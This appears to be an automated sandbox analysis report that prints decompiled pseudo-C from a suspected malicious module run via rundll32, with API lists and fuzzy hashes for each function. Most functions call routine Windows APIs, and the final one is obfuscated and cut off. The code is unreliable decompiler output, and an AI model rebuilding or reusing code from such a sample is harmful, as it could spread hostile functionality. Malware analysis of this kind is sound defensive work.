                          • Instruction ID: 64337ca45e74130f282471b2d9a91e85811e726cdd73c75f42f774a5f01a4502
                          • Opcode Fuzzy Hash: 2b4e3f0885e9eb37a8fc44de7bd93f5683866b9936bff66d8b5a59b6d3828a81
                          • Instruction Fuzzy Hash: 4CF01D7C914208AFDB11EB68D949B9DBBBAAF45304F944090E404EB6D1DB35AE40DB45
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 46%
                          			E027DCA44(int __eax, void* __ebx, void* __eflags) {
                          				char _v11;
                          				char _v16;
                          				intOrPtr _t28;
                          				void* _t31;
                          				void* _t33;
                          
                          				_t33 = __eflags;
                          				_v16 = 0;
                          				_push(_t31);
                          				_push(0x27dcaa8);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t31 + 0xfffffff4;
                          				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
                          				E027D4358( &_v16, 7,  &_v11);
                          				_push(_v16);
                          				E027D8620(7, GetACP(), _t33);
                          				_pop(_t28);
                          				 *[fs:eax] = _t28;
                          				_push(E027DCAAF);
                          				return E027D40E8( &_v16);
                          			}









                          APIs
                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,027DCAA8), ref: 027DCA6A
                          • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,027DCAA8), ref: 027DCA83
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: 747d82e04d2ddf06a805f9c28f139bd439af4f1858bf01dc1c4dc9718869fea6
                          • Instruction ID: 9a2ad073907b6be184d5573ab4acb5cba2593b333ab154d732d8b62e44d1b6bc
                          • Opcode Fuzzy Hash: 747d82e04d2ddf06a805f9c28f139bd439af4f1858bf01dc1c4dc9718869fea6
                          • Instruction Fuzzy Hash: 80F0F075E043086FEB06EFA1DC5498EB7BFEBC8710F40C4B5A220E7680EA7465008A94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0282EA08(intOrPtr* __eax, signed int* __edx) {
                          				signed int _v12;
                          				short _v14;
                          				char _v16;
                          				signed int _v20;
                          				intOrPtr* _v24;
                          				char _v280;
                          				signed int _t39;
                          				signed int _t40;
                          				signed int _t46;
                          				intOrPtr* _t47;
                          				signed int _t50;
                          				signed int _t53;
                          				intOrPtr _t55;
                          				intOrPtr _t56;
                          				signed int _t67;
                          				signed int _t68;
                          				void* _t73;
                          				signed int* _t79;
                          				intOrPtr _t90;
                          				intOrPtr* _t96;
                          
                          				_t79 = __edx;
                          				_t96 = __eax;
                          				if(( *(__eax + 0x1c) & 0x00000010) == 0) {
                          					L4:
                          					_t39 =  *_t79;
                          					if(_t39 < 0x100 || _t39 > 0x108) {
                          						_t40 =  *_t79;
                          						__eflags = _t40 - 0x200;
                          						if(_t40 < 0x200) {
                          							L30:
                          							__eflags = _t40 - 0xb00b;
                          							if(_t40 == 0xb00b) {
                          								E0282D2F0(_t96, _t79[1], _t40, _t79[2]);
                          							}
                          							L32:
                          							return  *((intOrPtr*)( *_t96 - 0x14))();
                          						}
                          						__eflags = _t40 - 0x20a;
                          						if(_t40 > 0x20a) {
                          							goto L30;
                          						}
                          						__eflags =  *(_t96 + 0x50) & 0x00000080;
                          						if(( *(_t96 + 0x50) & 0x00000080) != 0) {
                          							L16:
                          							_t46 =  *_t79 - 0x200;
                          							__eflags = _t46;
                          							if(__eflags == 0) {
                          								L21:
                          								_t47 =  *0x28645d4; // 0x2865b58
                          								E0281F26C( *_t47, _t79, _t96, __eflags);
                          								goto L32;
                          							}
                          							_t50 = _t46 - 1;
                          							__eflags = _t50;
                          							if(_t50 == 0) {
                          								L22:
                          								__eflags =  *((char*)(_t96 + 0x5d)) - 1;
                          								if(__eflags != 0) {
                          									 *(_t96 + 0x54) =  *(_t96 + 0x54) | 0x00000001;
                          									goto L32;
                          								}
                          								return E027D3408(_t96, __eflags);
                          							}
                          							_t53 = _t50 - 1;
                          							__eflags = _t53;
                          							if(_t53 == 0) {
                          								 *(_t96 + 0x54) =  *(_t96 + 0x54) & 0x0000fffe;
                          								goto L32;
                          							}
                          							__eflags = _t53 == 1;
                          							if(_t53 == 1) {
                          								goto L22;
                          							}
                          							_t55 =  *0x2865b94; // 0x41d1124
                          							__eflags =  *((char*)(_t55 + 0x20));
                          							if( *((char*)(_t55 + 0x20)) == 0) {
                          								goto L32;
                          							} else {
                          								_t56 =  *0x2865b94; // 0x41d1124
                          								__eflags =  *(_t56 + 0x1c);
                          								if( *(_t56 + 0x1c) == 0) {
                          									goto L32;
                          								}
                          								_t90 =  *0x2865b94; // 0x41d1124
                          								_t25 = _t90 + 0x1c; // 0x0
                          								__eflags =  *_t79 -  *_t25;
                          								if( *_t79 !=  *_t25) {
                          									goto L32;
                          								}
                          								GetKeyboardState( &_v280);
                          								_v20 =  *_t79;
                          								_v16 = E0281370C( &_v280);
                          								_v14 = _t79[1];
                          								_v12 = _t79[2];
                          								return E027D3408(_t96, __eflags);
                          							}
                          							goto L21;
                          						}
                          						_t67 = _t40 - 0x203;
                          						__eflags = _t67;
                          						if(_t67 == 0) {
                          							L15:
                          							 *_t79 =  *_t79 - 2;
                          							__eflags =  *_t79;
                          							goto L16;
                          						}
                          						_t68 = _t67 - 3;
                          						__eflags = _t68;
                          						if(_t68 == 0) {
                          							goto L15;
                          						}
                          						__eflags = _t68 != 3;
                          						if(_t68 != 3) {
                          							goto L16;
                          						}
                          						goto L15;
                          					}
                          					_v24 = E0281381C(_t96);
                          					if(_v24 == 0) {
                          						goto L32;
                          					}
                          					_t73 =  *((intOrPtr*)( *_v24 + 0xf0))();
                          					if(_t73 == 0) {
                          						goto L32;
                          					}
                          				} else {
                          					_v24 = E0281381C(__eax);
                          					if(_v24 == 0 ||  *((intOrPtr*)(_v24 + 0x250)) == 0) {
                          						goto L4;
                          					} else {
                          						_t73 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x250)))) + 0x24))();
                          						if(_t73 == 0) {
                          							goto L4;
                          						}
                          					}
                          				}
                          				return _t73;
                          			}

                          APIs
                          • GetKeyboardState.USER32(?,?,?,?,?,02831AEC), ref: 0282EB3D
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: KeyboardState
                          • String ID:
                          • API String ID: 1724228437-0
                          • Opcode ID: d2397e8f749fece150f23bbda70cdf7d474617b2b08ade5805450449e1f5b178
                          • Instruction ID: c21225aa86413670144cabe5074e280c0ad2e23cb17ffba2efd42cc963e8169c
                          • Opcode Fuzzy Hash: d2397e8f749fece150f23bbda70cdf7d474617b2b08ade5805450449e1f5b178
                          • Instruction Fuzzy Hash: 2F418E3CA006298FCB21DB28C5887A977E5FB45314F1845A5D44AEB290C774FDC9CF9A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027D8B14(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                          				long _v8;
                          				long _v12;
                          				long _v16;
                          				long _v20;
                          				intOrPtr _v24;
                          				signed int _v28;
                          				CHAR* _t25;
                          				int _t26;
                          				intOrPtr _t31;
                          				intOrPtr _t34;
                          				intOrPtr* _t37;
                          				intOrPtr* _t38;
                          				intOrPtr _t46;
                          				intOrPtr _t48;
                          
                          				_t25 = _a4;
                          				if(_t25 == 0) {
                          					_t25 = 0;
                          				}
                          				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
                          				_v28 = _v8 * _v12;
                          				_v24 = 0;
                          				_t46 = _v24;
                          				_t31 = E027D4F5C(_v28, _t46, _v16, 0);
                          				_t37 = _a8;
                          				 *_t37 = _t31;
                          				 *((intOrPtr*)(_t37 + 4)) = _t46;
                          				_t48 = _v24;
                          				_t34 = E027D4F5C(_v28, _t48, _v20, 0);
                          				_t38 = _a12;
                          				 *_t38 = _t34;
                          				 *((intOrPtr*)(_t38 + 4)) = _t48;
                          				return _t26;
                          			}

                          APIs
                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 027D8B35
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: DiskFreeSpace
                          • String ID:
                          • API String ID: 1705453755-0
                          • Opcode ID: fa0016be90b420377e4fc610e57c20bba999cfc4570db0a4da0a65e413e330a2
                          • Instruction ID: c8f57040b83f68c308837ef2f08dd7330a47d191b1666b32ce8805bf3dc1e1e6
                          • Opcode Fuzzy Hash: fa0016be90b420377e4fc610e57c20bba999cfc4570db0a4da0a65e413e330a2
                          • Instruction Fuzzy Hash: DC11DEB5E00209AF9B45CF99C881DAFF7FAFFC9300B14C569A519E7254E7319A018BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 53%
                          			E02803E5C(intOrPtr __eax, intOrPtr* __edx) {
                          				intOrPtr _v8;
                          				intOrPtr _t12;
                          				intOrPtr _t21;
                          				intOrPtr _t22;
                          				intOrPtr _t25;
                          
                          				_v8 = __eax;
                          				_t22 =  *__edx;
                          				_t26 = _t22 - 0x113;
                          				if(_t22 != 0x113) {
                          					_push( *((intOrPtr*)(__edx + 8)));
                          					_push( *((intOrPtr*)(__edx + 4)));
                          					_push(_t22);
                          					_t12 =  *((intOrPtr*)(_v8 + 0x34));
                          					_push(_t12);
                          					L027D6A3C();
                          					 *((intOrPtr*)(__edx + 0xc)) = _t12;
                          					return _t12;
                          				}
                          				_push(0x2803e96);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t25;
                          				E027D3408(_v8, _t26);
                          				_pop(_t21);
                          				 *[fs:eax] = _t21;
                          				return 0;
                          			}

                          APIs
                          • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 02803EC1
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: NtdllProc_Window
                          • String ID:
                          • API String ID: 4255912815-0
                          • Opcode ID: 88b6f79102ac23e1d4ec93bc0b8b3d72a4e065bfe0742dbb9661704f1dacaa68
                          • Instruction ID: 444462be3ae9a1319d702a12d49437e349f1041637cc833c816deb3fb4335ae9
                          • Opcode Fuzzy Hash: 88b6f79102ac23e1d4ec93bc0b8b3d72a4e065bfe0742dbb9661704f1dacaa68
                          • Instruction Fuzzy Hash: F3F0907A608204EFAB51DF9AEC91C9ABBECEB4972035140A6F908D7740D235AD00CB70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 51%
                          			E027D606E(int __eax, void* __ebx, void* __eflags) {
                          				char _v8;
                          				char _v15;
                          				char _v20;
                          				intOrPtr _t29;
                          				void* _t32;
                          
                          				_v20 = 0;
                          				_push(_t32);
                          				_push(0x27d60d6);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t32 + 0xfffffff0;
                          				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                          				E027D4358( &_v20, 7,  &_v15);
                          				E027D2C40(_v20,  &_v8);
                          				if(_v8 != 0) {
                          				}
                          				_pop(_t29);
                          				 *[fs:eax] = _t29;
                          				_push(E027D60DD);
                          				return E027D40E8( &_v20);
                          			}

                          APIs
                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,027D60D6), ref: 027D6096
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: 9a9c592cf3228b002b16569a4dd68197ba7de6c1dfbebc7473cedc57a9897cf1
                          • Instruction ID: f40cae3cf270a251c0fd4576644963a39699c9cff40535a46dd69006cc0028b8
                          • Opcode Fuzzy Hash: 9a9c592cf3228b002b16569a4dd68197ba7de6c1dfbebc7473cedc57a9897cf1
                          • Instruction Fuzzy Hash: CCF0C830A04309AFFB15DEA0CC55EEEB77BF784710F818975A52493580EB746A04CA90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 51%
                          			E027D6070(int __eax, void* __ebx, void* __eflags) {
                          				char _v8;
                          				char _v15;
                          				char _v20;
                          				intOrPtr _t29;
                          				void* _t32;
                          
                          				_v20 = 0;
                          				_push(_t32);
                          				_push(0x27d60d6);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t32 + 0xfffffff0;
                          				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                          				E027D4358( &_v20, 7,  &_v15);
                          				E027D2C40(_v20,  &_v8);
                          				if(_v8 != 0) {
                          				}
                          				_pop(_t29);
                          				 *[fs:eax] = _t29;
                          				_push(E027D60DD);
                          				return E027D40E8( &_v20);
                          			}

                          APIs
                          • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,027D60D6), ref: 027D6096
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: 7118fd6a14639dbd6b6106203d3844125768dda08d9704328b0f32044a076d1d
                          • Instruction ID: 5837530a264acd2004c3d854362a789a6f9c56718ddde1c291db4c34182c6054
                          • Opcode Fuzzy Hash: 7118fd6a14639dbd6b6106203d3844125768dda08d9704328b0f32044a076d1d
                          • Instruction Fuzzy Hash: 73F0C230A04309AFEB15EEA0CC55EEEB77BFB84710F818975922463580EBB42A04CA90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E027F8DCC(intOrPtr __eax, intOrPtr __edx) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				char _v48;
                          				struct _SYSTEM_INFO* _t17;
                          				unsigned int _t20;
                          				unsigned int _t22;
                          				signed int _t31;
                          				intOrPtr _t33;
                          
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				_t17 =  &_v48;
                          				GetSystemInfo(_t17);
                          				_t33 = _v8;
                          				_t31 = _v12 - 1;
                          				if(_t31 >= 0) {
                          					if( *((short*)( &_v48 + 0x20)) == 3) {
                          						do {
                          							_t20 =  *(_t33 + _t31 * 4) >> 0x10;
                          							 *(_t33 + _t31 * 4) = _t20;
                          							_t31 = _t31 - 1;
                          						} while (_t31 >= 0);
                          						return _t20;
                          					} else {
                          						goto L2;
                          					}
                          					do {
                          						L2:
                          						asm("bswap eax");
                          						_t22 =  *(_t33 + _t31 * 4) >> 8;
                          						 *(_t33 + _t31 * 4) = _t22;
                          						_t31 = _t31 - 1;
                          					} while (_t31 >= 0);
                          					return _t22;
                          				}
                          				return _t17;
                          			}

                          APIs
                          • GetSystemInfo.KERNEL32(?), ref: 027F8DDC
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: InfoSystem
                          • String ID:
                          • API String ID: 31276548-0
                          • Opcode ID: b8c6cea978487785527aa084d336ef268789afd8e8d40c78b767439d1045318d
                          • Instruction ID: 3dfe0ea8e1227826cbcd4cf22a339bf9b20eb9d60aff7394ed96d792564ba781
                          • Opcode Fuzzy Hash: b8c6cea978487785527aa084d336ef268789afd8e8d40c78b767439d1045318d
                          • Instruction Fuzzy Hash: 62F0F0B2E041089FCB00DF98C48889DBBB8FB56305B4042D9C504A7342EB30A694CB82
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027DB408(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
                          				char _v260;
                          				intOrPtr _t10;
                          				void* _t18;
                          
                          				_t18 = __ecx;
                          				_t10 = _a4;
                          				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
                          					return E027D413C(_t10, _t18);
                          				}
                          				return E027D41D8(_t10, _t5 - 1,  &_v260);
                          			}

                          APIs
                          • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 027DB426
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: be31c7a4645edda62e8c05d0072737695763908cd5bda183f1fc09d57379da4d
                          • Instruction ID: b52eee742141f8ecc5dfa3dc46af40c9868da1c3c1e0dafe6fb3b2151437f6a5
                          • Opcode Fuzzy Hash: be31c7a4645edda62e8c05d0072737695763908cd5bda183f1fc09d57379da4d
                          • Instruction Fuzzy Hash: 06E0D87270021417D711A5589C88AF7B36DD768310F00427ABE04D7380EEF1AD908BE5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E02818E08(intOrPtr* __eax, intOrPtr* __edx) {
                          				intOrPtr* _v8;
                          				intOrPtr* _v12;
                          				void* _t16;
                          
                          				_v12 = __edx;
                          				_v8 = __eax;
                          				if(IsIconic(E02833F7C(_v8)) != 0) {
                          					 *_v12 = 0x27;
                          					_t16 =  *((intOrPtr*)( *_v8 - 0x10))();
                          				} else {
                          					_t16 = E028323D0(_v8, _v12);
                          				}
                          				return _t16;
                          			}

                          APIs
                          • IsIconic.USER32(00000000), ref: 02818E1D
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Iconic
                          • String ID:
                          • API String ID: 110040809-0
                          • Opcode ID: 7ff8e2acc694d800b5d65bb5ba3c5ea45382089a99a28e389665102748badac9
                          • Instruction ID: ba491ba168d58469102d739aeaf4667aa793bf4b9ebfbd821a33afee4b690fca
                          • Opcode Fuzzy Hash: 7ff8e2acc694d800b5d65bb5ba3c5ea45382089a99a28e389665102748badac9
                          • Instruction Fuzzy Hash: 6AF0ED38908208EFDB00EFA8D98599DBBF9EF44324F204195D818E7790EB71AE40DF85
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E0281D70C(intOrPtr _a4) {
                          				intOrPtr _t26;
                          
                          				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
                          				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
                          				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
                          				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
                          				_push(_t26);
                          				L027D6A3C();
                          				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
                          				return _t26;
                          			}

                          APIs
                          • NtdllDefWindowProc_A.USER32(?,?,?,?,?,0281DE85,?,00000000,0281DE90), ref: 0281D736
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: NtdllProc_Window
                          • String ID:
                          • API String ID: 4255912815-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E027DB454(int __eax, char __ecx, int __edx) {
                          				char _v16;
                          				char _t5;
                          				char _t6;
                          
                          				_push(__ecx);
                          				_t6 = __ecx;
                          				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
                          					_t5 = _t6;
                          				} else {
                          					_t5 = _v16;
                          				}
                          				return _t5;
                          			}







                          APIs
                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,027DCD56,00000000,027DCF6F,?,?,00000000,00000000), ref: 027DB467
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027D9ED4() {
                          				struct _SYSTEMTIME* _t2;
                          
                          				GetLocalTime(_t2);
                          				return _t2->wYear;
                          			}





                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: LocalTime
                          • String ID:
                          • API String ID: 481472006-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E027DD804(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, char _a1) {
                          				intOrPtr _v117;
                          				signed int _t143;
                          				signed char _t146;
                          				signed char _t147;
                          				signed char _t148;
                          				signed char _t151;
                          				signed char _t152;
                          				signed char _t153;
                          				signed char _t156;
                          				signed char _t164;
                          				signed int _t166;
                          				intOrPtr* _t171;
                          				intOrPtr* _t173;
                          				intOrPtr* _t175;
                          				intOrPtr* _t177;
                          				void* _t181;
                          				signed int _t182;
                          				intOrPtr* _t183;
                          				signed int _t184;
                          				intOrPtr* _t185;
                          				signed int _t186;
                          				intOrPtr* _t187;
                          				signed int _t188;
                          				intOrPtr* _t189;
                          				signed int _t190;
                          				intOrPtr* _t191;
                          				signed int _t192;
                          				intOrPtr* _t193;
                          				signed int _t194;
                          				intOrPtr* _t195;
                          				signed int _t196;
                          				intOrPtr* _t197;
                          				signed int _t198;
                          				intOrPtr* _t199;
                          				signed int _t200;
                          				intOrPtr* _t201;
                          				signed int _t202;
                          				intOrPtr* _t203;
                          				signed int _t204;
                          				intOrPtr* _t205;
                          				signed int _t206;
                          				intOrPtr* _t207;
                          				signed int _t208;
                          				intOrPtr* _t209;
                          				signed int _t210;
                          				intOrPtr* _t211;
                          				signed int _t212;
                          				intOrPtr* _t213;
                          				intOrPtr* _t214;
                          				void* _t216;
                          				void* _t219;
                          				void* _t222;
                          				void* _t223;
                          				intOrPtr _t225;
                          				void* _t226;
                          				intOrPtr _t228;
                          				intOrPtr _t229;
                          				intOrPtr _t230;
                          				signed int _t231;
                          				intOrPtr* _t232;
                          				signed int _t234;
                          				void* _t284;
                          				signed char _t285;
                          				void* _t286;
                          				void* _t287;
                          				void* _t290;
                          				void* _t291;
                          				signed int _t292;
                          				void* _t293;
                          				signed int _t296;
                          				signed int _t299;
                          				signed char _t303;
                          				signed char _t305;
                          				signed char _t306;
                          				void* _t310;
                          				void* _t316;
                          				signed int* _t329;
                          				signed int* _t330;
                          				signed char _t331;
                          				signed char _t332;
                          				intOrPtr* _t333;
                          				intOrPtr _t334;
                          				intOrPtr _t335;
                          				intOrPtr _t336;
                          				intOrPtr _t337;
                          				intOrPtr _t338;
                          				intOrPtr _t339;
                          				intOrPtr _t340;
                          				intOrPtr _t341;
                          				intOrPtr _t342;
                          				intOrPtr _t343;
                          				intOrPtr _t344;
                          				void* _t346;
                          				void* _t355;
                          				signed int _t356;
                          				signed int _t357;
                          				intOrPtr _t359;
                          				void* _t362;
                          
                          				_t348 = __esi;
                          				asm("sbb eax, 0x10000000");
                          				_t143 = __eax ^  *(__esi - 0x79ba37fe);
                          				_t146 = (_t143 ^  *(__esi - 0x79bb3ffe)) +  *(_t143 ^  *(__esi - 0x79bb3ffe)) ^  *(__esi - 0x79bd17fe);
                          				_t147 = _t146 ^  *(__esi - 0x79b9dbfe);
                          				_t148 = _t147 ^  *(__esi - 0x79b99bfe);
                          				_t151 = (_t148 ^  *(__esi - 0x79bc33fe)) + (_t148 ^  *(__esi - 0x79bc33fe)) ^  *(__esi - 0x79bb57fe);
                          				_t152 = _t151 ^  *(__esi - 0x79bd5ffe);
                          				_t329 = __edx + _t147 + _t152;
                          				_t153 = _t152 ^  *(__esi - 0x79bafffe);
                          				_t316 = __ecx +  *_t143 + _t148 + _t153;
                          				_t156 = (_t153 ^  *(__esi - 0x79baaffe)) + (_t153 ^  *(__esi - 0x79baaffe)) ^  *(__esi - 0x79bb87fe);
                          				_t310 = __ebx + _t146 + _t151 +  *((intOrPtr*)(_t156 - 0x7bfd79ce));
                          				_t356 = _t355 + 1;
                          				 *_t329 = _t156;
                          				 *_t329 = 0x32;
                          				0xaa805eb7();
                          				_t346 = __edi + 1;
                          				 *_t329 = ( *_t329 ^  *(__esi - 0x79bb83fe)) +  *((intOrPtr*)(( *_t329 ^  *(__esi - 0x79bb83fe)) + 0x68028632));
                          				_t164 =  *_t329 ^  *(__esi - 0x79ba63fe);
                          				_t330 = _t329 +  *((intOrPtr*)(_t164 + 0x74028632));
                          				 *_t330 = _t164;
                          				 *_t330 = _t330;
                          				_t166 =  *_t330;
